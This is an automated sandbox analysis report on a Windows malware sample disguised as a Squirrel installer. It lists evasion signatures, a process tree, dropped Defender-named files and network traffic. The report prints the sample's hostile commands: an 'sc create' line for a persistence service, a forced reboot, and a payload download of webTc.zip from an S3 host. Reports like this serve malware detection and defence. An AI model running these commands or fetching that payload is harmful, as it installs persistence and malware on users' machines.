Windows Analysis Report
0219830219301290321012notas.exe

Overview

General Information

Sample name: 0219830219301290321012notas.exe
Analysis ID: 1397701
MD5: a548469585481a1b7f98c9b09d271349
SHA1: 677eabeb661d965c7d3d5ff6f6b9336e27b80b91
SHA256: 21340c04b12af92f3bd3dd076e5a4f20c0fe5558461b5ff3f848e5d5b7183322
Tags: exe
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found evasive API chain checking for user administrative privileges
Machine Learning detection for dropped file
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0219830219301290321012notas.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC MD5: A548469585481A1B7F98C9B09D271349)
    • Update.exe (PID: 1992 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • BumpFiles.exe (PID: 3692 cmdline: "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun MD5: CC09BB7FDEFC5763CCB3CF7DAE2D76CF)
        • BumpFiles.exe (PID: 4284 cmdline: "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" MD5: CC09BB7FDEFC5763CCB3CF7DAE2D76CF)
          • cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 320 cmdline: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • shutdown.exe (PID: 2300 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
            • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\ContentPack\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
3.0.Update.exe.b50000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

          System Summary

          Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ProcessId: 320, ProcessName: sc.exe
          No Snort rule has matched

          AV Detection

          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll, Virustotal: Detection: 11%
          Source: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll, Virustotal: Detection: 7%
          Source: 0219830219301290321012notas.exe, ReversingLabs: Detection: 15%
          Source: 0219830219301290321012notas.exe, Virustotal: Detection: 16%
          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll, Joe Sandbox ML: detected
          Source: 0219830219301290321012notas.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentPack
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log
          Source: unknown, HTTPS traffic detected: 3.5.232.21:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: 0219830219301290321012notas.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2050601484.000000000328D000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.7.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.7.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.7.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000003.00000002.2050601484.0000000003267000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.0000000003245000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe0.3.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.7.dr
          Source: Binary string: DefenderCSP.pdb source: DefenderCSP.dll.7.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.7.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.7.dr
          Source: Binary string: shellext.pdb source: shellext.dll.7.dr
          Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.7.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0219830219301290321012notas.exe
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.7.dr
          Source: Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.7.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.7.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.7.dr
          Source: Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.7.dr
          Source: Binary string: MsMpEng.pdb source: Update.exe, 00000003.00000002.2050601484.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000323D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe, BumpFiles.exe, 00000004.00000002.3857315150.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, BumpFiles.exe, 00000007.00000000.2031196791.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, MsMpEng.exe.7.dr
          Source: Binary string: MsMpEng.pdbGCTL source: MsMpEng.exe.7.dr
          Source: Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.7.dr
          Source: Binary string: DefenderCSP.pdbGCTL source: DefenderCSP.dll.7.dr
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00235564 FindFirstFileExW,0_2_00235564
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040D3E4 FindFirstFileW,FindClose,4_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,4_2_0040CE18
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040D3E4 FindFirstFileW,FindClose,7_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_0040CE18

          Networking

          Source: Yara matchFile source: Update.exe, type: SAMPLE
          Source: Yara matchFile source: 3.0.Update.exe.b50000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Local\ContentPack\Update.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /webTc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00633A38 Sleep,URLDownloadToFileW,Sleep,4_2_00633A38
          Source: unknownDNS traffic detected: queries for: awsserver903203232.s3.sa-east-1.amazonaws.com
          Source: Update.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/ContentPack.nuspec
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/_rels/.rels
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/BumpFiles.exe
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/MpSvc.dll
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
          Source: Update.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: MpCommu.dll.7.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
          Source: MpCommu.dll.7.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: MpCommu.dll.7.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: ThirdPartyNotices.txt.7.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: BumpFiles.exeString found in binary or memory: http://www.delphiforfun.org/
          Source: BumpFiles.exe, 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BumpFiles.exe, 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, MpSvc.dll.3.drString found in binary or memory: http://www.delphiforfun.org/openU
          Source: Update.exeString found in binary or memory: https://api.github.com/#
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/S
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/w
          Source: BumpFiles.exe, 00000007.00000002.3857430328.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857980024.0000000004E2D000.00000004.00001000.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip
          Source: BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipINC:
          Source: BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipOID
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipQ
          Source: ThirdPartyNotices.txt.7.drString found in binary or memory: https://github.com/Microsoft/cpprestsdk.
          Source: ThirdPartyNotices.txt.7.drString found in binary or memory: https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)
          Source: Update.exeString found in binary or memory: https://github.com/myuser/myrepo
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownHTTPS traffic detected: 3.5.232.21:443 -> 192.168.2.5:49704 version: TLS 1.2

          System Summary

          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe 545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll 7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: String function: 0022B010 appears 32 times
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: String function: 0040C1E4 appears 32 times
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: String function: 0041028C appears 32 times
          Source: 0219830219301290321012notas.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: NisSrv.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: ProtectionManagement.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui0.7.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.7.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.7.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.7.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.7.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: ProtectionManagement.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.7.drStatic PE information: No import functions for PE file found
          Source: 0219830219301290321012notas.exe, 00000001.00000003.2002772051.0000000001191000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 0219830219301290321012notas.exe
          Source: 0219830219301290321012notas.exe, 00000001.00000003.2002772051.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 0219830219301290321012notas.exe
          Source: 0219830219301290321012notas.exeBinary or memory string: OriginalFilenameSetup.exe6 vs 0219830219301290321012notas.exe
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: dwrite.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: msvcp140_clr0400.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: linkinfo.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: ntshrui.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: cscapi.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: appresolver.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: slc.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: sppc.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: wtsapi32.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: winsta.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: powrprof.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: umpdc.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: d3d9.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: d3d10warp.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: dataexchange.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: d3d11.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: dcomp.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: dxgi.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: twinapi.appcore.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: textinputframework.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: coreuicomponents.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: coremessaging.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: msctfui.dll
